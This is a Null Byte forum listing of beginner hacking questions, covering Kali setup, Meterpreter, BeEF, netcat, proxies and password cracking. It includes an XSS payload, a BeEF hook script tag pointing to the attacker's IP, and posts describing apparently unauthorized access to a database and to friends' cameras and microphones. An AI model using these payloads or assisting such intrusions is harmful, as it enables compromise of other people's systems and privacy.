Null Byte Forum

Forum Thread: Guys I Was Thinking of Ways to Use My Phone for Hacking with My Pc, Any Ideas?

I Have an android KitKat phone and i wanted to use it with my pc for hacking, i already know about dsploit and wifikill and other "hacking" apps but i was thinking about something more kali like, and i know that there's Kali Nethunter but it isnt compatible with my device, And i also thought about using my Phone as a wifi adapter but that option is only available on Windows, so any help or suggestion is appreciated.

Forum Thread: Unclear XSS, and What I Can Do with It

Hi everyone, I found a XSS on the site while editing my own profile - all info are sent to JSON, and if there is present a "- it's esceped like this \". When I save the profile, I caught a request via BURP and remove this \ symbol, ie got his clean line "> <img src = x onerror = prompt (1)>, after which it was pop-up window that you have an error in JSON {full JSON} Well, after this message I got out XSS. Though the data and preserved, but after relogin to this page - XSS does not fulfill ...

Forum Thread: How to Install Meterpreter Using EXE

Hello, This is my first post to Null Byte. I want to know how I would install Meterpreter using an executable on a Windows machine if I had direct access to the machine to install a file. I'm testing this out on VMs and cannot get it working. I'm using the following link. https://www.offensive-security.com/metasploit-unleashed/binary-payloads/

Forum Thread: How to Connect with BeEF

So , i started recently reading the Posts on Null Byte and stumbled over BeEF . I tried to do it myself and made a very simple Site with: <script src="http://myip:3000/hook.js " type="text/javascript"></script> . However , it didnt connected and im feeling very dumb because it looked very simple.

Forum Thread: Problem in Installing Kali Linux

i just download kali torrent (2.0) from its site....i make a bootable pendrive to install..i graphical install it but when it restart after installing it shows a dash and does not start..i waited for 30 mins but nothing happen...i try to re install it but same problem.....HELP ME FAST AS U CAN....PLZ

Forum Thread: Kali Vm Network

I have my Kali vm in NAT mode where I can access the internet and ping other computers on my network. The only problem is that it has a different internal IP. My vm internal IP is 10.0.2.15 and my computer IP is 192.168.10.103. I cant seem to ping the vm from my computer though. When I switched it to bridged adapter mode then it got a similar ip '192.168.10.108'however I could not ping my computer and couldn't connect to Google. An help? Thanks.

Forum Thread: Password Cracking

hello guys, i really need help. i recently managed to hack into a java aplications database and passwords were encrypted in this way . " 54CE5EBE53B874","3f 757D145C75FA4A4A36BA667A57A" to mention but a few. after along google searching, i realised these java applications use keys to encrypt passwords. i even downloaded the full system on my pc but dont know how to find the encryption keys. can some one help?? help will be apreciated

Forum Thread: Learning About Proxies

Hi all, I have a few questions about proxies that I can't seem to find the answer to on Google. When going through a high-anonymous proxy, your traffic is still transported in clear text. So if i were to gain access into a database on the other end, what is being read by me, can also be read by any of the proxies that I am going through, correct? Is there some sort of encryption along the way that would encrypt the data and prevent proxies from easily reading it?

Forum Thread: Testing Skills Learnt to Find Weakness's

So i have been going through all the post's on here and practicing on some computers mainly mine, family and friends and learned how easy it was to gain access and browse all files access camera and microphone... but my question is how do i test other services for weakness's ? you hear about people finding bugs in facebook's server and getting rewarded etc.. is it just a matter right "lets sit here and hack facebook, if i get in woohoo (what to do now share or report)"... or is they something...

Forum Thread: How Can I Connect to Netcat on a Different Network? Do I Need to Port Forward the Server?

I am a beginner in this field, but I am trying hard to succeed. If I say something that doesn't make sense, please correct me. I am going to buy a raspberry pi 2, and I'm intending to put Kali Linux on it, but I would like the functionality to connect back like in this post. But after many Google searches, my answer is somewhat mixed. Every example I've seen uses local IP addresses to connect back, but I intend to use it in remote situations. What can I do?

Forum Thread: Faceook Phish? Some Help Here

This might sound weird for null byte but I trust it the most.A friend on facebook sent me a link which did look suspicious, so I scanned it online blah blah and it didn't find anything. I don't even know that "friend" personally and it looked like she wasn't sending it - perhaps a bot.So I trusted the knowledge I learned here knowing that nothing can actually happen If i just click the link and not enter any info. The link was obviously malicious as it took me to a facebook post, however the ...